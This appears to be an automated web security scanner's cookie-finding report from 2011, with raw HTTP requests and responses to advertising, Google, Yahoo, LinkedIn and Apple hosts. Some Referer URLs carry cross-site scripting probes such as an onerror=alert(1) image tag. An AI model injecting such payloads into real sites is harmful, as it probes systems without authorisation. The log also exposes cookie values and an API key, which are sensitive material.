HTTP/1.1 200 OK Server: Resin/2.1.17 Cache-Control: no-cache,no-store Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM", policyref="http://my.boldchat.com/w3c/p3p.xml" Set-Cookie: bc-visitor-id=3760177095415339810=7851714395809697412; domain=.boldchat.com; path=/; expires=Fri, 03-Feb-2012 20:32:21 GMT Set-Cookie: bc-visit-id=3760177095415339810=9223372036839688863; domain=.boldchat.com; path=/ Set-Cookie: JSESSIONID=aP-3JlTQvoC6; path=/ Content-Type: text/html; charset=utf-8 Date: Thu, 03 Feb 2011 20:32:21 GMT Content-Length: 101191
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /load/?p=200&g=512 HTTP/1.1 Host: load.exelator.com Proxy-Connection: keep-alive Referer: http://www.veoh.com/browse/videos/category/action_adventure2e455%3Cimg%20src%3da%20onerror%3dalert(1)%3Ecd67645eb41/watch/v18978294NGnK88j8/x22 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: EVX=eJyNyjsOgCAQRdG9sIL5ZuCxmAkltaVh76KWNuZWNzkDinNCqmu0PsD3UT%252FAFYWtekaKeRJx7kpfE0oS4T9xkyDnL24P1hdb6sbrAgq5JDk%253D; xltl=eJxLtDKyqi62MrZSCvV0UbIGsoyslEwSE02STSwtzRPNU03MkiwsktMMUpItzCzSkgwtTFMNwOqslHyCnJWsM60MTSxNDcxNLaxrASUcFEk%253D; myPAL=eJylkj1PwzAQhv9LvHq4O387U2iEVIlEUALqytiZkfLfubPrtEVVB5iSOM89Pr%252Fnj4w2fx0y9J%252BZQu7Q%252BqRSSqgQrAIPauGXiVeo6w8ZBfOCBXfCAigAZCxAo2iVrdQtmWHMFll0iqIzIWkDFLiIrCvW4WHR2%252Fld76a93jxNehj3UmnXDWK4s4E7Y%252FECixVbGuYZw3iJEYCy0Sv5G25KEKrkrUmiYFXSAgyGz0DqlcBy30dA4RJzvuhSycbqRAEcagICJx8GfX1wDKbGMA589vFlXvS4nR%252B1pMJplIHI4Lz%252Fk09ULdxTsIj%252F0w3Ps6i4w13RyU2w%252BEt3z1CqysUw5yq8rqq9XI%252B8679%252FANW9nC8%253D; BFF=eJztlM1OwzAQhN8lT%252BCfOI6dS1MqRKQmQOpWcEI9cuYIvDtrN0nX7lqiqEeu30zGSbw7R1ty%252B%252FlhObOF46zsV8YYUTTvlpe1bkCQtugfB%252FewfX07dLvOFc3Rqir3TGXgGTVxhCKvRILxXDMUoRXg8oQR8Qnt2q1EraQ20xt6QQaOwOyUTGitEqEbDmQEcMJJRoz9CxkBnHBy%252BF4tCIHMvtv2ZDZwwklGtBsiWwaOnWK%252BkOg4HUlRjEbX6PCY1OcrdwjNMcmVxVJ0Qo1O2GdO2Oe8Egtg3glWwid%252FMe7ValLnWTyrWBCLkD6jFwVBmN1Nuw0jXZ6wmWbXY0S88XlwlBFwYuyGe8oIGJF5xo3QTPE4IWwJE0zFOIxWguc5p2LCphB%252BP7uUP6xF3i95lROSF%252FW%252Fnwpqn4bLg2XgSQAYyYAN%252Febterzwh1YZcQBfFiayftPlplW%252B3LJVdn1zXV9UVC9FV%252FL7Xrq%252Bhm7cOjeumL%252F2Sb42Mg2R6YPM9v%252Fv%252Bm1XO7vJP5xXI9Y%253D; TFF=eJydlUtywyAMhu%252BSE%252BgBFsIbH6NbL7zoTHftLpO7FzsJJGBcuQsGhvk%252FvSzkObLG63dEihcEN8EAk6rSZZwjxetnxDEtpz5tsB0HHW%252BNHlc9V3pKq%252BYkYzYi7eA6SmltLx%252FL1%252Fyz9GzTsJeGwASAe2lLCSYdW32dtjwdYcVJxmxE2gWMtteYyPleDqHkEO56V%252FQUPItWMYXWU0uiKgv9h2QgEW8lJYM2It05b43q2cRht%252BlDKPqwo28iCq2f8Nr0oW76LrF9U4DJheHYE7WuHpwRSZcAVuvPAiCcK9hDf7ZgCTtTMBROfUK7kWnR646%252BiUxbP3l%252B3TEbsT5kNtreHgkfPK88x1wmtYwAziPAmbkXj0oCvjvHuSa5kAQE9Xvug%252B8uGetGtQbL2PVZk5JBG5Hu2J%252BIKv8ID%252FPBv8huPg3JhTws%252Fjt4%252BwVfmf5g
Response
HTTP/1.1 200 OK Connection: close X-Powered-By: PHP/5.2.8 P3P: policyref=/w3c/p3p.xml, CP=NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA Content-Type: application/x-javascript Set-Cookie: xltl=eJxLtDKyqi62MrZSCvV0UbIGsoyslEwSE02STSwtzRPNU03MkiwsktMMUpItzCzSkgwtTFMNwOqslHyCnJWsM60MTSxNDSxNjaxrASUUFEU%253D; expires=Fri, 03-Jun-2011 20:52:27 GMT; path=/; domain=.exelator.com Set-Cookie: myPAL=eJylkstOwzAQRf%252Bl3noxM36M7a4CEVIlEkEJqNsuu2YJ%252FDszdpO2qCoSrPI699i5433BUD4OBdbvhbis0Mdscs5oELyBCGaSm0He0Gp9KKhYVIzDEWMwACgYw0zRIluoazInmK%252ByFAyl4DhbB8QSIh%252Bqtbub7GZ8s9thZ%252B8fB9v1O036ZYHENxYIJyydYalh04xFwTCdYwRgfIpGv%252FJVCUKTvM6SpFiTzAWyk38g80LgZd%252BfgMpl4WLV5dqNt5kYAloCgqAPDmO7SA2u1dB38u%252F98zjZfjM%252BWG1F2qgD0cHF%252BCefquZyj8Ui%252Fk%252FXPY2qkh1uq05PgscfuluGmqoHw51SeJlqe7kcec3psXDpt5wONyDJcL%252B%252BAQnrpp0%253D; expires=Mon, 04-Apr-2011 20:52:27 GMT; path=/; domain=.exelator.com Set-Cookie: TFF=eJydlU1ywyAMhe%252BSE%252BgHIoQ3Pka3XmTRme7aXSZ3L3YSSMC4ogsPHuZ96AlL8hKdi9fviBRPCG6GM8yqSqdpiRSvnxGn9Dj1aYHt9azTrdHjqudKT%252BmpOcmYjUgruI5S2rMvH5ev5efSO5tqZEtDYAbAvbSlmEmvrb5OW56BsOIkYzYirQLGs1dP5Hwvh1ByCHe9K3oKnkUrT6GN1JKoykL%252FIRlIxFtJyaCNSHvOW109izjsFn0IRR929I2j0MYJr0Uf6qLvEts3BZhdOB9HojbUgzMiaROg0y7InQtAGLuwh370whI2cmEonOqEdp1p0euOvnGmbZw8v%252B6YjVgbmY1nb03CB%252B2VP4zLpJYRwHkEODP3ElFJwHfnONckF5KAoO7nPvgekrEuVKtZxm7MmpQM2oi0x37AVf4RHuaDf5HdfBqSC3l4%252BQ34GCsed6v%252B0GrmhpN8I4eSfJJDSUrmbMTtF8bmQ6U%253D; expires=Fri, 03-Jun-2011 20:52:27 GMT; path=/; domain=.exelator.com Date: Thu, 03 Feb 2011 20:52:27 GMT Server: HTTP server Content-Length: 92
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /maps HTTP/1.1 Host: maps.google.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /maps/stk/lc?client=ca-pub-3033999741136561&lc_format=map_inset_ad&ll=41.946689%2C-87.722974&spn=0.009576%2C0.017166&z=15&ads_params=format%3A125x125_as%2Coutput%3Ahtml%2Ch%3A125%2Cw%3A125%2Clmt%3A1296787023%2Cchannel%3A5653360264%2Cad_type%3Atext%2Ccolor_bg%3Ac4d4f3%2Ccolor_border%3Ae5ecf9%2Ccolor_line%3Ac4d4f3%2Ccolor_link%3A0000cc%2Cflash%3A0%2Curl%3Ahttp%3A%2F%2Fwww.bizfind.us%2F15%2F182221%2Fabc-development-inc%2Fchicago.aspx%2Fx22%2F%2522ns%3D%2522alert(0x0006C1)%2Cadsafe%3Ahigh%2Cuiv%3A1%2Cdt%3A1296787023670%2Cshv%3Ar20100101%2Cjsv%3Ar20100101%2Ccorrelator%3A1296787013038%2Cfrm%3A0%2Cadk%3A3364239293%2Cga_vid%3A1487308896.1296787013%2Cga_sid%3A1296787013%2Cga_hid%3A720933573%2Cga_fc%3A1%2Cu_tz%3A-360%2Cu_his%3A0%2Cu_java%3A1%2Cu_h%3A1200%2Cu_w%3A1920%2Cu_ah%3A1156%2Cu_aw%3A1920%2Cu_cd%3A16%2Cu_nplug%3A0%2Cu_nmime%3A0%2Cbiw%3A1172%2Cbih%3A684%2Cfu%3A0%2Cjs%3Auds%2Ceid%3A37464000%2Chl%3Aen HTTP/1.1 Accept: text/html, application/xhtml+xml, */* Referer: http://www.bizfind.us/15/182221/abc-development-inc/chicago.aspx/x22/%22ns=%22alert(0x0006C1) Accept-Language: en-US User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Accept-Encoding: gzip, deflate Host: maps.google.com Proxy-Connection: Keep-Alive
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000cc;cursor:hand;}body,table,div,ul,li{font-size ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /maps/vp?spn=0.009576,0.017166&z=15&key=ABQIAAAAqUG6cBk-lc5l1KbeaOXOjhTubhXEVwpghVXLU4K27b8P7oUIhBSMYxh0xBzPJNNUP_E0Nghrmd9Stw&sensor=false&mapclient=jsapi&vp=41.946689,-87.722974 HTTP/1.1 Accept: */* Referer: http://www.bizfind.us/15/182221/abc-development-inc/chicago.aspx/x22/%22ns=%22alert(0x0006C1) Accept-Language: en-US User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Accept-Encoding: gzip, deflate Host: maps.google.com Proxy-Connection: Keep-Alive
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /nwshp HTTP/1.1 Host: news.google.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Set-Cookie: NID=43=uLb5N4IWzq69fpvU9NRMdRwqyZ6X0vlV4_5pv5CdNKeZzHIttIFsFFROwKvZ8yBA8mb0TbBcsP-oWgtp_QlmRTuRgp76nFXFc891WpJptaOSbHtr3dRtyEUGLvYLghHC;Domain=.google.com;Path=/;Expires=Fri, 05-Aug-2011 20:33:46 GMT;HttpOnly Date: Thu, 03 Feb 2011 20:33:46 GMT Expires: Thu, 03 Feb 2011 20:33:46 GMT Cache-Control: private, max-age=0 X-Content-Type-Options: nosniff X-Frame-Options: SAMEORIGIN X-XSS-Protection: 1; mode=block Server: GSE Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta http-equiv="X-UA-Compatible" content="IE=8"> <meta http-equiv="Content-Type" content="text/h ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /home HTTP/1.1 Host: picasaweb.google.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /lh/view?hl\x3den\x26tab\x3dwq\x22 HTTP/1.1 Host: picasaweb.google.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Expires: Thu, 03 Feb 2011 20:32:50 GMT Date: Thu, 03 Feb 2011 20:32:50 GMT Cache-Control: private, max-age=0, must-revalidate Set-Cookie: _rtok=mCwhgibP1AJo; Path=/; Secure; HttpOnly Set-Cookie: S=photos_html=YPoXsbXHf620OMz2tliwug; Domain=.google.com; Path=/; Secure; HttpOnly Content-Type: text/html; charset=UTF-8 X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block Server: GSE Connection: close
<html><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"></meta> <title>404 NOT_FOUND</title> <style><!-- body {font-family: arial,sans-serif} div.nav {margin-top: 1ex} div.nav A ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /api/segments.json?a=p-abhYEve3ZZl2E&callback=qc_results HTTP/1.1 Host: pixel.quantserve.com Proxy-Connection: keep-alive Referer: http://core.videoegg.com/eap/12368/html/swf/AdManager.swf Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: mc=4d21fad0-365c5-43e3d-97d7a; d=EDIAJKANq0itiBCpnizJGquYH6TbIAHAAQH7BYGWAJrRpq8bLyD5HhvB0jw45ZMG7R8sKEHRuiGpLi3xDJRgD7ICCx0w4wANMOMAjR9P44WSDU0esuGcFUAPJuELHrPBCxpRseEAKhHyAiABcuTD6CUDsjg7EeGaIQ If-None-Match: "J18332:E0-293462370-1296766279068"
Response
HTTP/1.1 200 OK Connection: close Set-Cookie: d=EBUAJKANq0itiBCpnizJGquYH6TbIAHAAQH8BYG2AJrRpq8bLyD5HhvB0jw45ZMG7R8sKEHRuiGpLi3xDJRgD7ICCx0w4wANMOMAjR9P44WSDU0esuGcFUAPJuELHrPBCxpRseEAKhHyAiABcuTD6CUDsjg7EeGaIQ; expires=Thu, 05-May-2011 02:23:00 GMT; path=/; domain=.quantserve.com P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR SAMa IND COM NAV" Content-Type: application/x-javascript ETag: "J18338:E0-293462370-1296766279068" Cache-Control: private, no-transform, max-age=600 Expires: Fri, 04 Feb 2011 02:33:00 GMT Content-Length: 159 Date: Fri, 04 Feb 2011 02:23:00 GMT Server: QS
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /pub/smart-devil/19/697/322/x22 HTTP/1.1 Host: qa.linkedin.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Server: Apache-Coyote/1.1 Set-Cookie: bcookie="v=1&f06c167d-8118-455e-944d-937f03c4ba49"; Version=1; Domain=linkedin.com; Max-Age=2147483647; Expires=Tue, 21-Feb-2079 23:47:48 GMT; Path=/ Last-Modified: Fri, 12 Mar 2010 22:11:19 GMT If-Modified-Since: Fri, 12 Mar 2010 22:11:19 GMT Set-Cookie: lang="v=2&lang=en"; Version=1; Domain=linkedin.com; Path=/ Content-Type: text/html;charset=UTF-8 Content-Language: en-US Date: Thu, 03 Feb 2011 20:33:42 GMT X-Cache: MISS from www.linkedin.com X-Cache-Lookup: MISS from www.linkedin.com:8080 Via: 1.0 www.linkedin.com (squid/3.0.STABLE20) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> < ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /schhp HTTP/1.1 Host: scholar.google.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /scholar?hl\x3den\x26tab\x3dws\x22 HTTP/1.1 Host: scholar.google.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"> <TITLE>302 Moved</TITLE></HEAD><BODY> <H1>302 Moved</H1> The document has moved <A HREF="http://scholar.google.com/schhp? ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /search HTTP/1.1 Host: shopping.yahoo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 20:33:43 GMT Set-Cookie: B=fcqcce56km497&b=3&s=rv; expires=Tue, 03-Feb-2013 20:00:00 GMT; path=/; domain=.yahoo.com P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV" Cache-Control: private Connection: close Content-Type: text/html;charset=utf-8 Content-Length: 27398
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html>
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /ref/lppb.asp HTTP/1.1 Host: solutions.liveperson.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Object moved Connection: close Date: Thu, 03 Feb 2011 17:52:33 GMT Server: Microsoft-IIS/6.0 P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM" X-Powered-By: ASP.NET Location: pbl.asp Content-Length: 128 Content-Type: text/html Set-Cookie: visitor=ref=LP+Power+%2D+; expires=Sun, 10-Jan-2010 05:00:00 GMT; domain=.liveperson.com; path=/ Set-Cookie: ASPSESSIONIDQSDTDCQS=DJKOGOICKIGDBAFDJAHHMONP; path=/ Cache-control: private
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="pbl.asp">here</a>.</body>
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /1-800-MY-APPLE/WebObjects/AppleStore.woa/wa/RSLID HTTP/1.1 Host: store.apple.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: dfa_cookie=appleglobal%2Capplehome; s_pathLength=homepage%3D1%2C; geo=US; s_sq=%5B%5BB%5D%5D; s_ppv=100%2C100%2C1012%2C; sfa=us; dssid2=16d90919-06cc-4154-b0ab-ecea038874a1; s_ria=Flash%2010%7C; s_orientationHeight=1012; s_invisit_us=homepage%3Dtrue%3B; s_cc=true; asmetrics=%257B%2522store%2522%253A%257B%2522sid%2522%253A%2522wHF2F2PHCCCX72KDY%2522%252C%2522vh%2522%253Atrue%257D%257D; ccl=jdzIb8K9vV85lgj7e4sRSa7IdqL3mZQgKYxUDOENQHhX4NgQ+hAHUjgfeXzwhT0VCFTyru8XWN+N/L/jGzQdpYsuk2VsqFGSRbYoRFzczGBT3k08MFdx7ArDyfn+0DUeklB3ZUvvxu2UGZL68tRXL5nMT2Qo6LXDFg/q92NkEy9l7Ex/aD5nRTHjg3bKpJ+d9yOL9KjL9tsu6MyHUSMFig/R05oZ1diiYGYKmnWDjirYA+366qqu5YCwZjGVMb1A0CnrJhwHt7JYisUlxFXcMpdOBiRmnAszqWRJTvqDZ0PHJ4GtEoGAAbGzJexrJBxwd1gKBY3lRlHxeRvk08jICn1OKruZekSYe6LYcunA7dbxGHwPUYvHCO3CqBvJzY9UNy046G49u5XHCPfIjmACnX8pQ/BKlNDkyD9h8r0DknuKwz5s342HyUWEA6KzRMT9F+OcHyNF2EbqvoTRb2A5O6P11IMLm1L/Dn8KZ6vTXXLHFrOR+o9muZkTFFNlmcrJ0IePJPb37Zspw5umwldBYgdsqrmUNcZQBoN1oGMUthjBbWvGVUIuZ9yuhyf1uCL6; s_vnum_us=ch%3Dhomepage%26vn%3D1%3B; s_orientation=%5B%5BB%5D%5D; s_vi=[CS]v1|26A574EF051633E8-40000181A05F3A9E[CE]; s_pv=apple%20-%20index%20(US);
Redirecting to <a HREF="http://store.apple.com/1-800-MY-APPLE/WebObjects/AppleStore.woa/920044001/wo/csKICi1o0fYy23BuHZ269hYUg3j/0.">http://store.apple.com/1-800-MY-APPLE/WebObjects/Ap ...[SNIP]...
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
s_vi_cex60ubx60qwucqtfubd=[CS]v4|0-0|4D4B10E0[CE]; Expires=Tue, 2 Feb 2016 20:32:32 GMT; Domain=.2o7.net; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /b/ss/superpagesadvert/1/H.14/s01692645419389 HTTP/1.1 Host: superpages.122.2o7.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vi_kx60gx60w=[CS]v4|26A20C60051617F4-40000183C02A4478|4D4418BF[CE]; s_vi_bohx7Fbcx7Dbjbx7Eyi=[CS]v4|2694879D05010AB6-600001152001C1C9|4D290F39[CE]; s_vi=[CS]v1|26A57D64051D0D1E-40000106C07D15FB[CE]; s_vi_x7Fx7Ex7Cyx7Eux3Dx7Bux7Ex3Dcduyx7E=[CS]v4|26A0E5B58501123C-400001062000534C|4D41CB69[CE]; s_vi_nxxx7Cbx60mfcjxxwx7Fx7Dx60k=[CS]v4|2697CD9905013D57-60000105600F9188|4D2F9B0A[CE]; s_vi_bwvx7Bux60wwqwasx60x3Fbx60x7Dv=[CS]v4|2696ED9D05011A65-6000010260187391|4D2E46F2[CE]; s_vi_dinydefxxelh=[CS]v4|2696E37B85158159-40000175A004C187|4D30BC07[CE];
Response
HTTP/1.1 302 Found Date: Thu, 03 Feb 2011 20:32:32 GMT Server: Omniture DC/2.0.0 Set-Cookie: s_vi_cex60ubx60qwucqtfubd=[CS]v4|0-0|4D4B10E0[CE]; Expires=Tue, 2 Feb 2016 20:32:32 GMT; Domain=.2o7.net; Path=/ Location: http://superpages.122.2o7.net/b/ss/superpagesadvert/1/H.14/s01692645419389?AQB=1&pccr=true&g=none&AQE=1 X-C: ms-4.3.1 Expires: Wed, 02 Feb 2011 20:32:32 GMT Last-Modified: Fri, 04 Feb 2011 20:32:32 GMT Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private Pragma: no-cache P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA" xserver: www354 Content-Length: 0 Content-Type: text/plain Connection: close
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
s_vi_cex60ubx60qwucqtfubd=[CS]v4|0-0|4D4B06F5[CE]; Expires=Tue, 2 Feb 2016 19:50:13 GMT; Domain=.2o7.net; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /b/ss/superpagesadvert/1/H.14/s03453267652075 HTTP/1.1 Host: superpages.122.2o7.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vi_kx60gx60w=[CS]v4|26A20C60051617F4-40000183C02A4478|4D4418BF[CE]; s_vi_bohx7Fbcx7Dbjbx7Eyi=[CS]v4|2694879D05010AB6-600001152001C1C9|4D290F39[CE]; s_vi=[CS]v1|26A57D64051D0D1E-40000106C07D15FB[CE]; s_vi_x7Fx7Ex7Cyx7Eux3Dx7Bux7Ex3Dcduyx7E=[CS]v4|26A0E5B58501123C-400001062000534C|4D41CB69[CE]; s_vi_nxxx7Cbx60mfcjxxwx7Fx7Dx60k=[CS]v4|2697CD9905013D57-60000105600F9188|4D2F9B0A[CE]; s_vi_bwvx7Bux60wwqwasx60x3Fbx60x7Dv=[CS]v4|2696ED9D05011A65-6000010260187391|4D2E46F2[CE]; s_vi_dinydefxxelh=[CS]v4|2696E37B85158159-40000175A004C187|4D30BC07[CE];
Response
HTTP/1.1 302 Found Date: Thu, 03 Feb 2011 19:50:13 GMT Server: Omniture DC/2.0.0 Set-Cookie: s_vi_cex60ubx60qwucqtfubd=[CS]v4|0-0|4D4B06F5[CE]; Expires=Tue, 2 Feb 2016 19:50:13 GMT; Domain=.2o7.net; Path=/ Location: http://superpages.122.2o7.net/b/ss/superpagesadvert/1/H.14/s03453267652075?AQB=1&pccr=true&g=none&AQE=1 X-C: ms-4.3.1 Expires: Wed, 02 Feb 2011 19:50:13 GMT Last-Modified: Fri, 04 Feb 2011 19:50:13 GMT Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private Pragma: no-cache P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA" xserver: www379 Content-Length: 0 Content-Type: text/plain Connection: close
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
s_vi_cex60ubx60qwucqtfubd=[CS]v4|0-0|4D4B06F5[CE]; Expires=Tue, 2 Feb 2016 19:50:13 GMT; Domain=.2o7.net; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /b/ss/superpagesadvert/1/H.14/s04304838050156 HTTP/1.1 Host: superpages.122.2o7.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vi_kx60gx60w=[CS]v4|26A20C60051617F4-40000183C02A4478|4D4418BF[CE]; s_vi_bohx7Fbcx7Dbjbx7Eyi=[CS]v4|2694879D05010AB6-600001152001C1C9|4D290F39[CE]; s_vi=[CS]v1|26A57D64051D0D1E-40000106C07D15FB[CE]; s_vi_x7Fx7Ex7Cyx7Eux3Dx7Bux7Ex3Dcduyx7E=[CS]v4|26A0E5B58501123C-400001062000534C|4D41CB69[CE]; s_vi_nxxx7Cbx60mfcjxxwx7Fx7Dx60k=[CS]v4|2697CD9905013D57-60000105600F9188|4D2F9B0A[CE]; s_vi_bwvx7Bux60wwqwasx60x3Fbx60x7Dv=[CS]v4|2696ED9D05011A65-6000010260187391|4D2E46F2[CE]; s_vi_dinydefxxelh=[CS]v4|2696E37B85158159-40000175A004C187|4D30BC07[CE];
Response
HTTP/1.1 302 Found Date: Thu, 03 Feb 2011 19:50:13 GMT Server: Omniture DC/2.0.0 Set-Cookie: s_vi_cex60ubx60qwucqtfubd=[CS]v4|0-0|4D4B06F5[CE]; Expires=Tue, 2 Feb 2016 19:50:13 GMT; Domain=.2o7.net; Path=/ Location: http://superpages.122.2o7.net/b/ss/superpagesadvert/1/H.14/s04304838050156?AQB=1&pccr=true&g=none&AQE=1 X-C: ms-4.3.1 Expires: Wed, 02 Feb 2011 19:50:13 GMT Last-Modified: Fri, 04 Feb 2011 19:50:13 GMT Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private Pragma: no-cache P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA" xserver: www298 Content-Length: 0 Content-Type: text/plain Connection: close
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
s_vi_cex60ubx60qwucqtfubd=[CS]v4|0-0|4D4B06F1[CE]; Expires=Tue, 2 Feb 2016 19:50:09 GMT; Domain=.2o7.net; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /b/ss/superpagesadvert/1/H.14/s07192756696604 HTTP/1.1 Host: superpages.122.2o7.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vi_kx60gx60w=[CS]v4|26A20C60051617F4-40000183C02A4478|4D4418BF[CE]; s_vi_bohx7Fbcx7Dbjbx7Eyi=[CS]v4|2694879D05010AB6-600001152001C1C9|4D290F39[CE]; s_vi=[CS]v1|26A57D64051D0D1E-40000106C07D15FB[CE]; s_vi_x7Fx7Ex7Cyx7Eux3Dx7Bux7Ex3Dcduyx7E=[CS]v4|26A0E5B58501123C-400001062000534C|4D41CB69[CE]; s_vi_nxxx7Cbx60mfcjxxwx7Fx7Dx60k=[CS]v4|2697CD9905013D57-60000105600F9188|4D2F9B0A[CE]; s_vi_bwvx7Bux60wwqwasx60x3Fbx60x7Dv=[CS]v4|2696ED9D05011A65-6000010260187391|4D2E46F2[CE]; s_vi_dinydefxxelh=[CS]v4|2696E37B85158159-40000175A004C187|4D30BC07[CE];
Response
